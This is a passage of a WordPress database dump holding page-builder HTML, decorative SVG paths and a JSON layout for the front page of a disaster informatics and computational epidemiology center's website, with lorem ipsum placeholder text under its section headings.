d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:45:12','2022-02-16 15:45:12','',22,'https://gsudice.dataconn.net/?p=332',0,'revision','',0),(336,1,'2022-02-16 15:45:52','2022-02-16 15:45:52','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:45:52','2022-02-16 15:45:52','',168,'https://gsudice.dataconn.net/?p=336',0,'revision','',0),(337,1,'2022-02-16 15:45:52','2022-02-16 15:45:52','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">population disparities</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem 